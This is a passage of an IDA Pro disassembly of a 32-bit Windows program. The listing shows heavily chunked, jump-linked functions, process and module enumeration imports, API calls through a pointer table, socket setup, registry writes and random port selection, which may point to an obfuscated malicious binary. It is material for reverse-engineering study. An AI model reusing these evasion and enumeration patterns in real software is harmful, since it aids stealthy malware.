loc_9AAC00: ; CODE XREF: .text:009AABF8�j
mov edx, eax
xor eax, eax
and cl, 1Fh
shl edx, cl
retn
; ---------------------------------------------------------------------------
loc_9AAC0A: ; CODE XREF: .text:009AABF3�j
xor eax, eax
xor edx, edx
retn
; ---------------------------------------------------------------------------
align 10h
unknown_libname_3: ; Microsoft VisualC 2-8/net runtime
cmp cl, 40h
jnb short loc_9AAC2A
cmp cl, 20h
jnb short loc_9AAC20
shrd eax, edx, cl
shr edx, cl
retn
; ---------------------------------------------------------------------------
loc_9AAC20: ; CODE XREF: .text:009AAC18�j
mov eax, edx
xor edx, edx
and cl, 1Fh
shr eax, cl
retn
; ---------------------------------------------------------------------------
loc_9AAC2A: ; CODE XREF: .text:009AAC13�j
xor eax, eax
xor edx, edx
retn
; [000000AB BYTES: COLLAPSED FUNCTION _CRT_INIT(x,x,x). PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Process32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Process32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Module32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Module32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC6A0
loc_9AADB0: ; CODE XREF: sub_9AC6A0+87F1�j
; DATA XREF: .text:off_9B93DF�o
pop ebp
pop ebx
add esp, 14h
retn
; END OF FUNCTION CHUNK FOR sub_9AC6A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AADB8: ; CODE XREF: sub_9AB1A0+1B22�j
; DATA XREF: .text:off_9BA07C�o
mov eax, dword_9BCB74
mov ecx, [eax+10h]
push dword_9BEC30[esi]
pop edx
push edx
call dword ptr [ecx+34h]
not eax
inc eax
mov [ebp-34h], eax
push dword ptr [ebp-20h]
pop ecx
cmp ecx, eax
jb loc_9B04E8
jmp off_9BA5F0
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9AADE4: ; CODE XREF: sub_9B3150-3080�j
mov ecx, 80h
push dword ptr [ebx+48h]
pop edx
sub eax, eax
mov esi, [ebx]
lea edi, [esi+edx-200h]
rep stosd
lea edi, [ebx+4]
mov ecx, 10h
mov esi, [ebx+48h]
rep movsd
mov dword ptr [ebp-1Ch], 1
jmp loc_9AEFA3
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AAE14: ; CODE XREF: sub_9B0930-2385�j
; DATA XREF: .text:off_9B9550�o
push dword ptr [eax+8]
pop edx
test edx, edx
jz loc_9B23EF
jmp off_9B99FA
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AAE28: ; CODE XREF: sub_9AB1A0+558C�j
push edi
call sub_9B3EFC
add esp, 4
test eax, eax
jnz loc_9B2911
jmp loc_9B290C
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3F28
loc_9AAE40: ; CODE XREF: sub_9B3F28+14�j
push dword_9BCB74
pop ecx
push [esp+arg_8]
pop eax
push dword ptr [ecx+10h]
pop edx
push [esp+arg_4]
pop ecx
push 10h
push eax
mov eax, [esp+8+arg_0]
push 0
push ecx
push eax
push esi
call dword ptr [edx+40h]
sub ecx, ecx
and eax, eax
setnle cl
dec ecx
and ecx, 0FFFFFFFDh
add ecx, 4
mov eax, ecx
; END OF FUNCTION CHUNK FOR sub_9B3F28
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_9B3A74
loc_9AAE78: ; CODE XREF: sub_9B3A74+85�j
; DATA XREF: .text:off_9BAC90�o
push esi
lea eax, [ebp-120h]
call sub_9B18F8
push dword ptr [esi+44h]
pop ecx
mov eax, [esi]
push eax
mov edx, ecx
lea eax, [ebp-120h]
call sub_9AB95C
add esp, 4
mov ecx, dword_9BCB74
push dword ptr [ecx+0Ch]
pop edx
lea eax, [ebp-124h]
push eax
push 20006h
push 0
push ebx
push edi
call dword ptr [edx+20h]
test eax, eax
jz loc_9AED9C
jmp off_9B9E28
; END OF FUNCTION CHUNK FOR sub_9B3A74
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AAEC8: ; CODE XREF: sub_9ADAC4+6824�j
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop ecx
push 6
push 1
push 2
call dword ptr [ecx+20h]
mov ebx, eax
mov [ebp-44h], ebx
test ebx, ebx
jz loc_9B0BD3
jmp loc_9B326C
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AAEF0: ; CODE XREF: sub_9B4FD0-4179�j
; sub_9B4FD0+749�j
; DATA XREF: ...
lea edi, [ebx+ebx*2]
shl edi, 4
mov dword_9BBF74[edi], 1
push dword ptr [ebp+0Ch]
pop eax
mov dword_9BBF78[edi], eax
push dword ptr [ebp+1Ch]
pop ecx
mov dword_9BBF7C[edi], ecx
push dword ptr [ebp+10h]
pop edx
mov dword_9BBF80[edi], edx
mov eax, [ebp+14h]
mov dword_9BBF84[edi], eax
push dword ptr [ebp+18h]
pop ecx
mov dword_9BBF88[edi], ecx
mov edx, [ebp+24h]
mov dword_9BBF8C[edi], edx
push dword ptr [ebp+20h]
pop eax
mov dword_9BBF90[edi], eax
call sub_9B227C
mov dword_9BBF98[edi], eax
mov dword_9BBF94[edi], eax
mov dword_9BBFA0[edi], esi
push dword_9BCB74
pop ecx
mov eax, [ecx]
push esi
push 80h
push 2
push esi
push esi
push 0C0000000h
push ebx
jmp off_9BA031
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3BE8
loc_9AAF7C: ; CODE XREF: sub_9B3BE8+17�j
; DATA XREF: .text:off_9B9E72�o
mov ecx, [esp+arg_0]
push ecx
sub eax, edx
push off_9B8E51 ; Format
add eax, esi
push 10h ; Count
push eax ; Dest
call _snprintf
push esi
pop eax
add esp, 10h
retn 4
; END OF FUNCTION CHUNK FOR sub_9B3BE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AAF9C: ; CODE XREF: sub_9ADAC4+22E0�j
mov ecx, esi
call sub_9B31A8
loc_9AAFA3: ; CODE XREF: sub_9ADAC4-665�j
; sub_9ADAC4+22DA�j
inc edi
jmp loc_9AE6B7
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABADC
loc_9AAFAC: ; CODE XREF: sub_9ABADC+C�j
push esi
loc_9AAFAD: ; CODE XREF: sub_9ABADC-B1F�j
movzx esi, byte ptr [ecx]
xor eax, esi
push eax
pop esi
shr esi, 1Fh
add eax, eax
or eax, esi
inc ecx
dec edx
jnz short loc_9AAFAD
jmp off_9B9402
; END OF FUNCTION CHUNK FOR sub_9ABADC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B6078
loc_9AAFC8: ; CODE XREF: sub_9B6078-A722�j
mov eax, ebx
lea edx, [eax+1]
loc_9AAFCD: ; CODE XREF: sub_9B6078-B0A6�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_9AAFCD
jmp off_9BA85D
; END OF FUNCTION CHUNK FOR sub_9B6078
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AAFDC: ; CODE XREF: sub_9B1D80+3578�j
mov eax, [ebp-2020h]
or eax, eax
jnz loc_9B3ECB
jmp off_9BA3A0
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AAFF0: ; CODE XREF: sub_9AB1A0+46�j
; DATA XREF: .text:off_9B9F48�o
push off_9BAD92
call dword ptr [edx+18h]
mov dword ptr [ebp-4], 0
push dword ptr [ebp+10h]
pop eax
mov dword ptr [eax], 0
sub edi, edi
sub esi, esi
mov [ebp-24h], edi
mov [ebp-28h], esi
loc_9AB014: ; CODE XREF: sub_9AB1A0+1B0D�j
cmp esi, 20h
jnb loc_9B0534
jmp off_9BA168
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AB02C: ; CODE XREF: sub_9B3864-F7C�j
push 0C01h
pop ecx
div ecx
add edx, 400h
jmp loc_9B269E
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AB040 proc near ; CODE XREF: sub_9B1D80-206F�p
; sub_9B3864+51A�p
; FUNCTION CHUNK AT 009AC5DC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009ADFA8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B0688 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B0D90 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B6548 SIZE 00000013 BYTES
mov eax, dword_9BCB74
mov ecx, [eax]
push edi
push off_9BAD92
sub edi, edi
call dword ptr [ecx+18h]
sub eax, eax
loc_9AB055: ; CODE XREF: sub_9AB040+B510�j
mov ecx, dword_9BEC1C[eax]
test ecx, ecx
jz loc_9B6548
jmp loc_9AC5DC
sub_9AB040 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9AB068: ; CODE XREF: sub_9B4950-8E06�j
; DATA XREF: .text:off_9B9268�o
lea esi, [edi+edi*4]
shl esi, 3
cmp dword_9BEC1C[esi], ebx
jz loc_9AFE40
jmp loc_9B5C34
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AB080: ; CODE XREF: sub_9B1D80-3A98�j
; DATA XREF: .text:off_9B9399�o
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov eax, [ebp-203Ah]
push eax
call dword ptr [edx+28h]
push eax
sub eax, eax
mov edx, [ebp-2038h]
call sub_9B1334
loc_9AB0A2: ; CODE XREF: sub_9B1D80-5B57�j
; sub_9B1D80-3A9E�j ...
push 0
push 0
push 0
push 0
movzx eax, word ptr [ebp-2022h]
add eax, ebx
push eax
push dword ptr [ebp-2050h]
pop ecx
push ecx
push 0
mov edx, [ebp+14h]
push edx
jmp loc_9AFD0D
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AB0C8: ; CODE XREF: sub_9B63D8-5152�j
cmp al, 39h
jg loc_9AF944
jmp loc_9B1D1C
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AB0D8: ; CODE XREF: sub_9B0930+3967�j
; DATA XREF: .text:off_9B8998�o
push off_9B9445
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx]
mov [ecx+60h], eax
push dword_9BCB74
pop edx
mov eax, [edx]
push dword ptr [eax+60h]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp loc_9B37B4
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B327C
loc_9AB10C: ; CODE XREF: sub_9B327C+14�j
; DATA XREF: .text:off_9BAAA5�o
cmp al, 0Ah
jz loc_9B4264
jmp off_9BA137
; END OF FUNCTION CHUNK FOR sub_9B327C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AB11C proc near ; CODE XREF: sub_9B2830+FDF�p
; sub_9B2830+1D65�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 009B31EC SIZE 00000006 BYTES
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push off_9B8ED2
call dword ptr [ecx+18h]
push [esp+arg_4]
pop ecx
mov eax, off_9B97DD
push [esp+arg_0]
pop edx
call sub_9B2C30
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
push off_9B8ED2
jmp loc_9B31EC
sub_9AB11C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AB158: ; CODE XREF: sub_9B1A08-2208�j
mov [esi+ebp-41BCh], eax
test eax, eax
jz loc_9AD484
jmp loc_9AD46C
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AB16C: ; CODE XREF: sub_9B3864-441F�j
; DATA XREF: .text:off_9BAC67�o
xor edx, edx
cmp edi, 6
setnz dl
dec edx
movzx ebx, [ebp+var_2022]
and edx, 200h
add edx, 200h
cmp ebx, edx
jl loc_9AF480
jmp off_9BA828
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9AB198: ; CODE XREF: sub_9B5904-3342�j
; sub_9B5904-E54�j
inc ecx
jmp loc_9B47F0
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9AB1A0 proc near ; CODE XREF: sub_9B1A08-134E�p
; sub_9B1F68+7F8�p
; FUNCTION CHUNK AT 009AADB8 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009AAE28 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009AAFF0 SIZE 00000033 BYTES
; FUNCTION CHUNK AT 009ABD24 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AC030 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 009ACC88 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009ACCB4 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009ACD50 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009ACF74 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009AD304 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009ADC08 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009ADCB0 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009ADFDC SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AE134 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AE758 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AEA48 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009AEB54 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AF858 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AFE6F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B015C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B04E8 SIZE 00000046 BYTES
; FUNCTION CHUNK AT 009B0534 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B0720 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B1038 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B11EB SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009B143C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B2248 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B290C SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B4A50 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B4AFC SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B4D58 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009B5894 SIZE 00000050 BYTES
; FUNCTION CHUNK AT 009B5B2C SIZE 00000059 BYTES
; FUNCTION CHUNK AT 009B5B88 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B5B90 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B5C48 SIZE 00000035 BYTES
; FUNCTION CHUNK AT 009B5F54 SIZE 00000017 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B8FD0
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
xor eax, eax
cmp ecx, 6
setnz al
mov edi, eax
mov eax, [ebp+14h]
mov ecx, dword_9BCB74
and eax, eax
push dword ptr [ecx]
pop edx
jz loc_9B5C48
jmp off_9B9F48
sub_9AB1A0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9AB1EC: ; CODE XREF: sub_9B3408+8E�j
mov [ebp-124h], esi
jmp loc_9AB749
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AB1F8: ; CODE XREF: sub_9B0930-4D78�j
push off_9B9F20
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx]
pop ecx
mov [ecx+98h], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop edx
push dword ptr [edx+98h]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp loc_9B1714
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AB230: ; CODE XREF: sub_9B0930-558C�j
push off_9B8F89
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx+8]
mov [edx+8], eax
push dword_9BCB74
pop eax
push dword ptr [eax+8]
pop ecx
push dword ptr [ecx+8]
pop edx
test edx, edx
jz loc_9B23EF
jmp loc_9AEFC0
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9AB264: ; CODE XREF: sub_9AC250+76F4�j
; DATA XREF: .text:off_9B8908�o
pop edi
pop ebp
pop ebx
retn 4
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9AB26C: ; CODE XREF: sub_9B3FF8-5B9D�j
push [ebp+var_20]
pop eax
and edi, 0FFFF7FFFh
sub ecx, ecx
mov [ebp+var_1C], eax
mov [esi+8], di
mov [esi], ecx
mov [esi+4], ecx
jmp loc_9AF9C3
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0734
loc_9AB28C: ; CODE XREF: sub_9B0734+3B15�j
; DATA XREF: .text:off_9B8DE3�o
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
push 1
pop esi
call dword ptr [eax+4Ch]
cmp eax, 2738h
jz loc_9B2674
jmp loc_9ACD64
; END OF FUNCTION CHUNK FOR sub_9B0734
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AB2B0: ; CODE XREF: sub_9B1F68-4167�j
; DATA XREF: .text:off_9BA7C5�o
push dword ptr [eax+ebp-24Ch]
pop ecx
test ecx, ecx
jnz loc_9B1480
jmp loc_9B403C
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AB2C8: ; CODE XREF: sub_9B63D8-6A7F�j
cmp eax, 0FFFFFFFFh
jz loc_9AE7BE
jmp loc_9AE7B0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9AB2D8: ; CODE XREF: sub_9AC250+7453�j
; DATA XREF: .text:off_9BA7CD�o
cmp edi, ebx
jz loc_9AC264
jmp loc_9B5368
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9AB2E8: ; CODE XREF: sub_9B4950-1FF2�j
mov edx, dword_9BCB74
mov eax, [edx]
push off_9BAD92
call dword ptr [eax+1Ch]
jmp loc_9B49DE
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9AB300: ; CODE XREF: sub_9B3EFC-3C04�j
; DATA XREF: .text:off_9BA4D9�o
and eax, 0FFFFFFh
cmp eax, 0C0h
jz loc_9AD6E0
jmp loc_9AEA5C
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B082C
loc_9AB318: ; CODE XREF: sub_9B082C+B�j
push dword_9B994C
pop edx
mov [edi], edx
mov ax, word_9B9950
mov [edi+4], ax
; END OF FUNCTION CHUNK FOR sub_9B082C
; START OF FUNCTION CHUNK FOR sub_9B27D8
loc_9AB32B: ; CODE XREF: sub_9B27D8-5116�j
mov ecx, dword_9BCB74
mov edx, [ecx]
push off_9B8ED2
call dword ptr [edx+18h]
mov eax, off_9B97DD
call sub_9AD7A4
mov esi, eax
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9B8ED2
call dword ptr [ecx+1Ch]
sub edx, edx
push esi
pop eax
mov ecx, 3
div ecx
and edx, edx
jnz loc_9AF59C
jmp off_9BAC25
; END OF FUNCTION CHUNK FOR sub_9B27D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AB374: ; CODE XREF: sub_9B0930+51E8�j
push off_9B9FAA
mov eax, [eax+8]
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx+8]
mov [ecx+4], eax
mov edx, dword_9BCB74
push dword ptr [edx+8]
pop eax
mov ecx, [eax+4]
and ecx, ecx
jz loc_9B23EF
jmp loc_9AB230
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; =============== S U B R O U T I N E =======================================
sub_9AB3B0 proc near ; CODE XREF: sub_9B63D8-150A�p
; FUNCTION CHUNK AT 009AB834 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B24E0 SIZE 00000075 BYTES
; FUNCTION CHUNK AT 009B3C08 SIZE 00000021 BYTES
push esi
push edi
mov esi, off_9B89EF
push ebx
pop edi
push 7
pop ecx
rep movsd
movsw
movsb
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9B8ED2
call dword ptr [ecx+18h]
push off_9B97DD
pop eax
call sub_9AD7A4
mov edx, dword_9BCB74
mov esi, eax
push dword ptr [edx]
pop eax
push off_9B8ED2
call dword ptr [eax+1Ch]
push esi
pop eax
xor edx, edx
mov ecx, 5
div ecx
mov edx, off_9B9A70[edx*4]
push edx
pop eax
loc_9AB408: ; CODE XREF: sub_9AB3B0+5D�j
mov cl, [edx]
inc edx
or cl, cl
jnz short loc_9AB408
jmp loc_9AB834
sub_9AB3B0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AB414: ; CODE XREF: sub_9ADAC4+57B1�j
; DATA XREF: .text:off_9B8CB5�o
push esi
sub eax, eax
push dword ptr [ebp-50h]
pop edx
lea esi, [ebp-3Ch]
call sub_9B1334
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop eax
push 10h
mov ecx, esi
push ecx
push ebx
call dword ptr [eax+18h]
and eax, eax
jnz loc_9ADCDC
jmp off_9BA637
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B4610
loc_9AB447: ; CODE XREF: sub_9B4610+4A�j
mov [ebp+var_4], 0FFFFFFFFh
mov edx, dword_9BCB74
mov eax, [edx]
push off_9BA623
call dword ptr [eax+1Ch]
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B4610
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9AB474: ; CODE XREF: sub_9AF25C+33CE�j
; DATA XREF: .text:off_9B9598�o
push edi
pop edx
call sub_9AF654
test eax, eax
jnz loc_9B3F5C
jmp loc_9AB9C8
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9AB488: ; CODE XREF: sub_9AC32C-857�j
mov [esp+324h+var_100], ecx
mov [esp+324h+var_104], edx
loc_9AB496: ; CODE XREF: sub_9AC32C-85D�j
push [esp+324h+arg_4]
pop eax
mov ecx, dword_9BCB74
sub edi, edi
mov [esp+324h+var_314], eax
mov [esp+324h+var_310], edi
push dword ptr [ecx+10h]
pop edx
lea eax, [esp+324h+var_314]
push eax
mov ecx, ebx
neg ecx
sbb ecx, ecx
lea eax, [esp+328h+var_104]
and ecx, eax
push ecx
push ebp
pop ecx
neg ecx
sbb ecx, ecx
lea eax, [esp+32Ch+var_208]
and ecx, eax
push ecx
push esi
pop ecx
neg ecx
lea eax, [esp+330h+var_30C]
sbb ecx, ecx
and ecx, eax
push ecx
jmp loc_9B61AC
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADCEC
loc_9AB4EC: ; CODE XREF: sub_9ADCEC+5B�j
and eax, eax
jnz loc_9ACE2C
jmp off_9B8A0E
; END OF FUNCTION CHUNK FOR sub_9ADCEC
; ---------------------------------------------------------------------------
align 4
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
call dword ptr [ecx+84h]
and eax, eax
jns loc_9AD4C0
jmp off_9BA0D4
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9ABA3C
loc_9AB51F: ; CODE XREF: sub_9ABA3C+486D�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-124h]
pop eax
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9ABA3C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9AB548: ; CODE XREF: sub_9B2F1C-7399�j
mov ecx, [ebp+0Ch]
mov dword ptr [ecx], 0
jmp loc_9B528F
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AB558: ; CODE XREF: sub_9B63D8-AE10�j
; DATA XREF: .text:off_9B8910�o
call sub_9B45AC
xor edx, edx
push 0Ah
pop ecx
div ecx
and edx, edx
jz loc_9B4EC8
jmp off_9BA364
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AB574 proc near ; CODE XREF: sub_9ADCEC-2472�p
; sub_9B1F68-51CE�p ...
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push esi
push off_9BAA6D
call dword ptr [ecx+18h]
mov edx, dword_9BCB74
mov eax, [edx]
push dword_9BBD24
pop esi
push off_9BAA6D
call dword ptr [eax+1Ch]
mov eax, esi
pop esi
retn
sub_9AB574 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AB5A4: ; CODE XREF: sub_9B63D8-F0F�j
; DATA XREF: .text:off_9BA98E�o
mov ecx, dword_9BCB74
mov edx, [ecx]
call dword ptr [edx+30h]
mov [ebp-214Ch], eax
push 0Ah
push 50h
push ebx
call sub_9AD11C
cmp eax, 4
jnz loc_9AF944
jmp off_9B8910
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AB5D0: ; CODE XREF: sub_9B63D8-76C4�j
jmp loc_9AF94B
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AB5D8: ; CODE XREF: sub_9B0930+E16�j
push off_9BABB0
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
